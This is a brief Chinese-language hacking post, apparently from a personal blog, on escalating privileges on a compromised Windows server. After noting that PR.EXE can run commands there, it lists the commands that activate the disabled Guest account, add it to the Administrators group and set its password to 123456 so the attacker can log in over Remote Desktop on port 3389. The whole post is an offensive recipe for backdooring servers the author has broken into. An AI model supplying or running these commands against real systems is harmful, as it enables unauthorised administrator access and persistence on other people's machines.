提权之Guest

遇到一个服务器，提权的时候利用PR.EXE可以执行命令，成功添加一个帐号，但是无法将帐号提出到Administrators。

这个时候有个方法就是利用被禁用的Guest用户，

首先执行CMD命令：net user guest /active:yes  Guest

激活Guest用户

然后讲Guest提升到Administrators权限。

执行CMD命令：net localgroup administrators guest /add

这个时候就可以连接3389了。

当然没有Guest密码，可以执行修改Guset密码net user guest 123456就可以了。将Guest密码

修改为123456.这样就添加帐号成功

没什么技术含量，而且遇到这种情况也不多。呵呵

无法提升新增帐号的，所以只能提升Guest用户。